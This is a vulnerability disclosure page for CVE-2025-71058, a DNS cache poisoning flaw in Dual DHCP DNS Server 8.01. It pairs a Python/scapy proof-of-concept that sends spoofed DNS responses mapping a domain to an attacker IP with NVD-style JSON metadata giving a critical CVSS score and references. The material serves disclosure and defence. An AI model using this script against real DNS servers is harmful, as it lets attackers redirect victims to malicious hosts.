CVE-2025-71058

#!/usr/bin/env python3 # PoC for CVE-2025-71058: DNS Cache Poisoning # This script sends a forged DNS response to poison the cache. from scapy.all import * import random def send_poisoned_response(target_ip, target_port, txid, domain_to_poison, malicious_ip): # Construct IP layer with spoofed source (upstream DNS IP) # Note: In real attacks, source IP is spoofed to match legitimate upstream DNS. # If the target does not validate source, spoofing might not be strictly required, # but standard DNS poisoning implies spoofing. ip = IP(src="192.168.1.1", dst=target_ip) # Replace with actual upstream IP if needed # Construct UDP layer udp = UDP(sport=53, dport=target_port) # Construct DNS layer # id=txid is crucial for the server to accept the response # qr=1 indicates a response dns = DNS( id=txid, qr=1, qd=DNSQR(qname=domain_to_poison), an=DNSRR(rrname=domain_to_poison, type="A", ttl=300, rdata=malicious_ip) ) # Send the packet packet = ip / udp / dns send(packet) print(f"[*] Poisoned response sent for {domain_to_poison} -> {malicious_ip}") if __name__ == "__main__": # Configuration TARGET_DNS = "192.168.1.100" # IP of the vulnerable Dual DHCP DNS Server DOMAIN = "example.com" MALICIOUS_IP = "6.6.6.6" # TXID needs to be guessed or sniffed. Assuming we have it. TXID = random.randint(0, 65535) send_poisoned_response(TARGET_DNS, 53, TXID, DOMAIN, MALICIOUS_IP)

{"cve": {"id": "CVE-2025-71058", "sourceIdentifier": "[email protected]", "published": "2026-04-07T19:16:43.220", "lastModified": "2026-04-21T20:16:26.490", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS responses without validating that the response originates from a legitimate configured upstream DNS server. The implementation matches responses primarily by TXID and inserts results into the cache, enabling a remote attacker to inject forged responses and poison the DNS cache, potentially redirecting victims to attacker-controlled destinations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/FPokerFace/Security-Advisory/blob/main/CVE-2025-71058/poc.c", "source": "[email protected]"}, {"url": "https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058", "source": "[email protected]"}, {"url": "https://sourceforge.net/projects/dhcp-dns-server/", "source": "[email protected]"}]}}